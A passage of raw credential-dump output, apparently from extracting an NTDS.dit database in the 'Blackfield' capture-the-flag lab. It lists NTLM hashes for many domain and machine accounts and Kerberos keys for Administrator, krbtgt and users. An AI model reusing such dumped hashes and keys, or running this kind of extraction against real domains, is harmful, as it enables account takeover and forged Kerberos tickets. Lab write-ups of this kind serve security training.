            BLACKFIELD.local\BLACKFIELD617630:1317:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD717683:1318:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD390192:1319:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD652779:1320:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD665997:1321:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD998321:1322:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD946509:1323:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD228442:1324:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD548464:1325:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD586592:1326:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD512331:1327:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD609423:1328:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD395725:1329:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD438923:1330:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD691480:1331:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD236467:1332:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD895235:1333:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD788523:1334:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD710285:1335:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD357023:1336:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD362337:1337:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD651599:1338:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD579344:1339:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD859776:1340:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD789969:1341:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD356727:1342:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD962999:1343:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD201655:1344:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD635996:1345:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD478410:1346:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD518316:1347:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD202900:1348:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD767498:1349:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD103974:1350:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD135403:1351:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD112766:1352:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD978938:1353:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD871753:1354:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD136203:1355:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD634593:1356:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD274367:1357:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD520852:1358:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD339143:1359:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD684814:1360:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD792484:1361:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD802875:1362:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD383108:1363:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD318250:1364:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD496547:1365:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD219914:1366:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD454313:1367:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD460131:1368:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD613771:1369:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD632329:1370:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD402639:1371:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD235930:1372:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD246388:1373:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD946435:1374:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD739227:1375:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD827906:1376:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD198927:1377:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD169876:1378:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD150357:1379:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD594619:1380:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD274109:1381:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD682949:1382:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD316850:1383:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD884808:1384:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD327610:1385:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD899238:1386:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD184493:1387:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD631162:1388:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD591846:1389:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD896715:1390:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD500073:1391:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD584113:1392:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD204805:1393:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD842593:1394:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD397679:1395:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD842438:1396:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD286615:1397:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD224839:1398:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD631599:1399:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD247450:1400:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD290582:1401:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD657263:1402:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD314351:1403:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD434395:1404:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD410243:1405:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD307633:1406:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD758945:1407:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD541148:1408:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD532412:1409:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD996878:1410:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD653097:1411:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            BLACKFIELD.local\BLACKFIELD438814:1412:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
            svc_backup:1413:aad3b435b51404eeaad3b435b51404ee:9658d1d1dcd9250115e2205d9f48400d:::
            BLACKFIELD.local\lydericlefebvre:1414:aad3b435b51404eeaad3b435b51404ee:a2bc62c44415e12302885d742b0a6890:::
            PC01$:1415:aad3b435b51404eeaad3b435b51404ee:de1e7748b6b292bfff4fd5adb54b4608:::
            PC02$:1416:aad3b435b51404eeaad3b435b51404ee:9cd62550f6042af1d85b38f608edef7a:::
            PC03$:1417:aad3b435b51404eeaad3b435b51404ee:86f46da5167729c9e258b63daa2eb299:::
            PC04$:1418:aad3b435b51404eeaad3b435b51404ee:1b8af9e72f9bd07af393f824a75bb65b:::
            PC05$:1419:aad3b435b51404eeaad3b435b51404ee:897a3aa7ce0d53ef1402be63105440a9:::
            PC06$:1420:aad3b435b51404eeaad3b435b51404ee:91eeb06d11d82cb6d745f11af78ed9f6:::
            PC07$:1421:aad3b435b51404eeaad3b435b51404ee:c0f006c96344a09e6c124df4b953a946:::
            PC08$:1422:aad3b435b51404eeaad3b435b51404ee:cd4a9354602e28b34906e0d5cc55124a:::
            PC09$:1423:aad3b435b51404eeaad3b435b51404ee:c1fa1cce0fc36e357677478dc4cbfb1d:::
            PC10$:1424:aad3b435b51404eeaad3b435b51404ee:9526e0338897f4f124b48b208f914edc:::
            PC11$:1425:aad3b435b51404eeaad3b435b51404ee:08453b2b98a2da1599e93ec639a185f8:::
            PC12$:1426:aad3b435b51404eeaad3b435b51404ee:8c2548fa91bdf0ebad60d127d54e82c1:::
            PC13$:1427:aad3b435b51404eeaad3b435b51404ee:5b3468bd451fc7e6efae47a5a21fb0f4:::
            SRV-WEB$:1428:aad3b435b51404eeaad3b435b51404ee:48e7b5032d884aed3a64ba6d578bbfbc:::
            SRV-FILE$:1429:aad3b435b51404eeaad3b435b51404ee:6e46f924ac2066e3d6c594262b969535:::
            SRV-EXCHANGE$:1430:aad3b435b51404eeaad3b435b51404ee:93d9144d68086d3b94907107e928b961:::
            SRV-INTRANET$:1431:aad3b435b51404eeaad3b435b51404ee:e9d6ae78b303e80c7ea724a2ccf28c51:::
            [*] Kerberos keys from /home/kali/Desktop/temp/NTDS.dit 
            Administrator:aes256-cts-hmac-sha1-96:dbd84e6cf174af55675b4927ef9127a12aade143018c78fbbe568d394188f21f
            Administrator:aes128-cts-hmac-sha1-96:8148b9b39b270c22aaa74476c63ef223
            Administrator:des-cbc-md5:5d25a84ac8c229c1
            DC01$:aes256-cts-hmac-sha1-96:0619a1691d150dd3d305a5963d770cecf2f2fdbf4b39333846d2525c92904de7
            DC01$:aes128-cts-hmac-sha1-96:67467685dd98f1dbfd625d496a7ae62d
            DC01$:des-cbc-md5:7a5e1ff7da08a2ea
            krbtgt:aes256-cts-hmac-sha1-96:bd31681b175bd44ddf68c064445ca4e510ba2115e106905bdfef6ef0ff66b32c
            krbtgt:aes128-cts-hmac-sha1-96:676f63c263b8d482b271d091b2dde762
            krbtgt:des-cbc-md5:fb4cb5761aef465d
            audit2020:aes256-cts-hmac-sha1-96:bdeca8eb67c5e70984efdfb33defdfc15644408fb06e948df7dba6d1760e0c0e
            audit2020:aes128-cts-hmac-sha1-96:5d1e1cb1fc6b59436fe9c9454c1d1608
            audit2020:des-cbc-md5:c40701e67a10b673
            support:aes256-cts-hmac-sha1-96:74574c46cab866ba40841f83b1226d429f6338fdf574f9a232ef551f9b7550c9
            support:aes128-cts-hmac-sha1-96:19331e579612b1eb3356e8b5f0e2d890
            support:des-cbc-md5:dfae341cef208f52
            BLACKFIELD.local\BLACKFIELD764430:aes256-cts-hmac-sha1-96:7dcefd1338c5bcddd117c45a0b82fde8b8cd8353dd11933cfe258648d5ad0b35
            BLACKFIELD.local\BLACKFIELD764430:aes128-cts-hmac-sha1-96:fadca38b7a1018e7b399ca49dec883f1
            BLACKFIELD.local\BLACKFIELD764430:des-cbc-md5:377adac13770d083
            BLACKFIELD.local\BLACKFIELD538365:aes256-cts-hmac-sha1-96:292cea91348aaaf13d5b6beab9c48b478f65717edb9ae7992c2676f73beb6677
            BLACKFIELD.local\BLACKFIELD538365:aes128-cts-hmac-sha1-96:67f07732506ccca5031501c11164374b
            BLACKFIELD.local\BLACKFIELD538365:des-cbc-md5:0d9d732976492cea
            BLACKFIELD.local\BLACKFIELD189208:aes256-cts-hmac-sha1-96:04a5b7220fe1b309e97831d7ec283c6adc759c44672e8c42ada14c0e5922a910
            BLACKFIELD.local\BLACKFIELD189208:aes128-cts-hmac-sha1-96:a06d3667bdb8ec8efacd82fdcc09841a
            BLACKFIELD.local\BLACKFIELD189208:des-cbc-md5:91ae58520dc197ba
            BLACKFIELD.local\BLACKFIELD404458:aes256-cts-hmac-sha1-96:5f85eb0c400f4fc44c43b0a2b7a70175c210938be122499614ae71d567f4c743
            BLACKFIELD.local\BLACKFIELD404458:aes128-cts-hmac-sha1-96:5247a3c02b2f000fd1b6a7cf71f36079
            BLACKFIELD.local\BLACKFIELD404458:des-cbc-md5:dc6d2319c2610215
            BLACKFIELD.local\BLACKFIELD706381:aes256-cts-hmac-sha1-96:3930d79b877bc5393fc0930696f6a5e953d3ad8f1c9907cb697897eb8d07859e
            BLACKFIELD.local\BLACKFIELD706381:aes128-cts-hmac-sha1-96:3ac6586f98119d543358d98ff3b4f4aa
            BLACKFIELD.local\BLACKFIELD706381:des-cbc-md5:c8c88fa483f8cd70
            BLACKFIELD.local\BLACKFIELD937395:aes256-cts-hmac-sha1-96:af6b6de3d56fd9129c6439e79492485b7c2f7223df815e69b2f424010c0e3b27
            BLACKFIELD.local\BLACKFIELD937395:aes128-cts-hmac-sha1-96:11ea676dbb2d6ff92fe484582fe8fc1e
            BLACKFIELD.local\BLACKFIELD937395:des-cbc-md5:20435b38bf29eac8
            BLACKFIELD.local\BLACKFIELD553715:aes256-cts-hmac-sha1-96:b6fdddc8cbdf0dd1c1a4be2b1964e9b95c2b9b4cc60b7e3bf80cf6062e2f55a0
            BLACKFIELD.local\BLACKFIELD553715:aes128-cts-hmac-sha1-96:3d1e582d905c93118d37a6b09cd61b83
            BLACKFIELD.local\BLACKFIELD553715:des-cbc-md5:ad26df1c4aa20785
            BLACKFIELD.local\BLACKFIELD840481:aes256-cts-hmac-sha1-96:cd6f1d874a5ff796e8aefef3f4d062440a040f4b2447bf897ba862142e81304f
            BLACKFIELD.local\BLACKFIELD840481:aes128-cts-hmac-sha1-96:907fdb7d4fb8211d5b46b805636b13fa
            BLACKFIELD.local\BLACKFIELD840481:des-cbc-md5:fbb5b579b6d3fe3b
            BLACKFIELD.local\BLACKFIELD622501:aes256-cts-hmac-sha1-96:be69507ac95769a6152d47adac718506098eb8414c2709904a1ec8fa155a014f
            BLACKFIELD.local\BLACKFIELD622501:aes128-cts-hmac-sha1-96:c0b95bee8b215e194b32a69701fe85f5
            BLACKFIELD.local\BLACKFIELD622501:des-cbc-md5:3e314f5d8a0e6d5d
            BLACKFIELD.local\BLACKFIELD787464:aes256-cts-hmac-sha1-96:70e25a0532e643a65585b3805b05aea75c1771b54270766a643b7ec03d8e7614
            BLACKFIELD.local\BLACKFIELD787464:aes128-cts-hmac-sha1-96:0201b01af1e61014f6b22294c18f0905
            BLACKFIELD.local\BLACKFIELD787464:des-cbc-md5:df207951980eb5e6
            BLACKFIELD.local\BLACKFIELD163183:aes256-cts-hmac-sha1-96:287500dae45a11b1acee60eb9c2c6f34d1203326b88f8d11cdfb8d51450b46b1
            BLACKFIELD.local\BLACKFIELD163183:aes128-cts-hmac-sha1-96:5d3b033f2f9d4fa8991cec6a7a86d22d
            BLACKFIELD.local\BLACKFIELD163183:des-cbc-md5:bf5bfd2904a8e3ba
            BLACKFIELD.local\BLACKFIELD869335:aes256-cts-hmac-sha1-96:af3429f1b6c405ad0ed3c5a78ed28c5f3447280ed6709f46acfa51e3f7b9e2c4
            BLACKFIELD.local\BLACKFIELD869335:aes128-cts-hmac-sha1-96:de3ef980cbd3f3648c9d23c4351fdeb3
            BLACKFIELD.local\BLACKFIELD869335:des-cbc-md5:cbcb68f8e638d304
            BLACKFIELD.local\BLACKFIELD319016:aes256-cts-hmac-sha1-96:d91af8de44019f3fd4a461351005b25707f3f71b2586e871f42e3cdd44cb85dc
            BLACKFIELD.local\BLACKFIELD319016:aes128-cts-hmac-sha1-96:ff0e32d54fcce276bd6e77476c97471a
            BLACKFIELD.local\BLACKFIELD319016:des-cbc-md5:8543946d9b649e5d
            BLACKFIELD.local\BLACKFIELD600999:aes256-cts-hmac-sha1-96:def69b5882e4f7d31110a82d1a96a1ff4b07465a11fb4819902efc0f8033ec08
            BLACKFIELD.local\BLACKFIELD600999:aes128-cts-hmac-sha1-96:49e0efb13858c2de5d25eee426c34516
            BLACKFIELD.local\BLACKFIELD600999:des-cbc-md5:d3a1b5a74f970889
            BLACKFIELD.local\BLACKFIELD894905:aes256-cts-hmac-sha1-96:b76ee89611e0cd3f2e13e12499c7aee833ea646cd80e06faa6b10b96f2df94fd
            BLACKFIELD.local\BLACKFIELD894905:aes128-cts-hmac-sha1-96:903933dbec80868b830009ee963e35a6
            BLACKFIELD.local\BLACKFIELD894905:des-cbc-md5:25fe370dc88361f2
            BLACKFIELD.local\BLACKFIELD253541:aes256-cts-hmac-sha1-96:4a4545c4ec8dd92df1bb57acf975764fffa7c2aabc7fcb68582ef158b975a0e0
            BLACKFIELD.local\BLACKFIELD253541:aes128-cts-hmac-sha1-96:7d5da7405fc4f926dd7d4698a56af003
            BLACKFIELD.local\BLACKFIELD253541:des-cbc-md5:40c8eaf197230dad
            BLACKFIELD.local\BLACKFIELD175204:aes256-cts-hmac-sha1-96:0558c305679cdf7cd90ce6dd4f468aafe8438f23d8db9b9899df709d072b66e3
            BLACKFIELD.local\BLACKFIELD175204:aes128-cts-hmac-sha1-96:eccd112fbcdcd09ac70931e818a8df88
            BLACKFIELD.local\BLACKFIELD175204:des-cbc-md5:adc2c4e06bb93115
            BLACKFIELD.local\BLACKFIELD727512:aes256-cts-hmac-sha1-96:4e5ddd8d21ded6b456698fcfbcfda628619f0b4478b64f89202bf49da9d9996a
            BLACKFIELD.local\BLACKFIELD727512:aes128-cts-hmac-sha1-96:1cfd442429742febe9861a6720a7ae4d
            BLACKFIELD.local\BLACKFIELD727512:des-cbc-md5:6b8973493bd5b532
            BLACKFIELD.local\BLACKFIELD227380:aes256-cts-hmac-sha1-96:21cb8e052ac3e2ea2a4bcf475e4b781f0439e16d6631705c4c736829b5ceba4f
            BLACKFIELD.local\BLACKFIELD227380:aes128-cts-hmac-sha1-96:c12d605de1be405b72d2257d37e9ac30
            BLACKFIELD.local\BLACKFIELD227380:des-cbc-md5:3770e39eb019f743
            BLACKFIELD.local\BLACKFIELD251003:aes256-cts-hmac-sha1-96:fcb1703d6675a1929df1ab0da32e88513bd0015acb57c5d0b3a23566da0d64e4
            BLACKFIELD.local\BLACKFIELD251003:aes128-cts-hmac-sha1-96:e1c74bff5f10b51136eabfcdf43a8aaf
            BLACKFIELD.local\BLACKFIELD251003:des-cbc-md5:f4b958cd45250849
            BLACKFIELD.local\BLACKFIELD129328:aes256-cts-hmac-sha1-96:10920ee5248eb3828e9b01af97d0d621e75810f6c0f36fff272196f13ba77572
            BLACKFIELD.local\BLACKFIELD129328:aes128-cts-hmac-sha1-96:720a1a8b270ec39823c6661f6cdf3f20
            BLACKFIELD.local\BLACKFIELD129328:des-cbc-md5:2cf2a254ab15dcf7
            BLACKFIELD.local\BLACKFIELD616527:aes256-cts-hmac-sha1-96:f3a17db53fdc2bca0835f0a443c270512615536a489fb22f9839cf396aa4d134
            BLACKFIELD.local\BLACKFIELD616527:aes128-cts-hmac-sha1-96:e562c4dcc6b9c2b269e7bd5fc2b945ca
            BLACKFIELD.local\BLACKFIELD616527:des-cbc-md5:98203d0d75f4c104
            BLACKFIELD.local\BLACKFIELD533551:aes256-cts-hmac-sha1-96:dcef4f8136e123065925970b9483118f7528fe723193fd0e74cef50a4893d86b
            BLACKFIELD.local\BLACKFIELD533551:aes128-cts-hmac-sha1-96:d9ea0b05f9f39fc90e506c59e3df4d2a
            BLACKFIELD.local\BLACKFIELD533551:des-cbc-md5:97c1cee9b54ff7c7
            BLACKFIELD.local\BLACKFIELD883784:aes256-cts-hmac-sha1-96:08a71e0175199905dc94746717bd5b44f7fc76df16184d8b1cfafdd6d63caee2
            BLACKFIELD.local\BLACKFIELD883784:aes128-cts-hmac-sha1-96:8ca3dbfd4f0c395f7906e6dd1688b205
            BLACKFIELD.local\BLACKFIELD883784:des-cbc-md5:54b6f74691fe6154
            BLACKFIELD.local\BLACKFIELD908329:aes256-cts-hmac-sha1-96:c70189df04f785945965c30196ce526575a62b3d5c0e22867dd2ea65c37ef726
            BLACKFIELD.local\BLACKFIELD908329:aes128-cts-hmac-sha1-96:db3afc9a69a3de46df02de822571fd92
            BLACKFIELD.local\BLACKFIELD908329:des-cbc-md5:ba61a73226c80d6b
            BLACKFIELD.local\BLACKFIELD601590:aes256-cts-hmac-sha1-96:cdbd7172ba397d1fddddc99e0b70506405606957b72fd16c7b8b508a73c8add1
            BLACKFIELD.local\BLACKFIELD601590:aes128-cts-hmac-sha1-96:ce3cc6f3a0d6ee71f323e16ad0c23521
            BLACKFIELD.local\BLACKFIELD601590:des-cbc-md5:b9c13bcd97ec40ef
            BLACKFIELD.local\BLACKFIELD573498:aes256-cts-hmac-sha1-96:08519ef299bb7f0080a22a212df142bb9b588bc614d8a404720006bfb0228959
            BLACKFIELD.local\BLACKFIELD573498:aes128-cts-hmac-sha1-96:ff83fd85ff0b04590ca371a2db5343e4
            BLACKFIELD.local\BLACKFIELD573498:des-cbc-md5:1f04980b625bc4a4
            BLACKFIELD.local\BLACKFIELD290325:aes256-cts-hmac-sha1-96:ab66a3d4789a5707f4e9fa82af34cdd5ac62c71b2ccbd931c1337cd435033f0a
            BLACKFIELD.local\BLACKFIELD290325:aes128-cts-hmac-sha1-96:d644a83c711a76fa5198a0152ffd5966
            BLACKFIELD.local\BLACKFIELD290325:des-cbc-md5:2967e5839b75abad
            BLACKFIELD.local\BLACKFIELD775986:aes256-cts-hmac-sha1-96:b46c04e4af1bbbfc8714f66b5e9b4a9790fee64de399ff8f71b50f45a0dc3d8f
            BLACKFIELD.local\BLACKFIELD775986:aes128-cts-hmac-sha1-96:013e4c5aad471bc3dcfa0667c4078a6b
            BLACKFIELD.local\BLACKFIELD775986:des-cbc-md5:8a57a776c8678fd5
            BLACKFIELD.local\BLACKFIELD348433:aes256-cts-hmac-sha1-96:26f7d0a260c5394bc2269011ced8f1d326e22437b477c773a0eb1a63fb60a784
            BLACKFIELD.local\BLACKFIELD348433:aes128-cts-hmac-sha1-96:dd74ffb2e25c396cbccc3880491f7c2f
            BLACKFIELD.local\BLACKFIELD348433:des-cbc-md5:08c726ef409d7010
            BLACKFIELD.local\BLACKFIELD196444:aes256-cts-hmac-sha1-96:bd88bbba1aaff6b5826a55f592b042b48e639e0ea0636c7da221654f98fa5bd5
            BLACKFIELD.local\BLACKFIELD196444:aes128-cts-hmac-sha1-96:c32634f779bc592be3e877c5df60c2ee
            BLACKFIELD.local\BLACKFIELD196444:des-cbc-md5:4cbf790d8032d92c
            BLACKFIELD.local\BLACKFIELD137694:aes256-cts-hmac-sha1-96:d214a2dff17010027a839cd20dbb202cfc29c5d90dcb08560e7fdb468f6afa3e
            BLACKFIELD.local\BLACKFIELD137694:aes128-cts-hmac-sha1-96:30ea85aec02e2bb65b1806681682492d
            BLACKFIELD.local\BLACKFIELD137694:des-cbc-md5:fdae04e5f1f47640
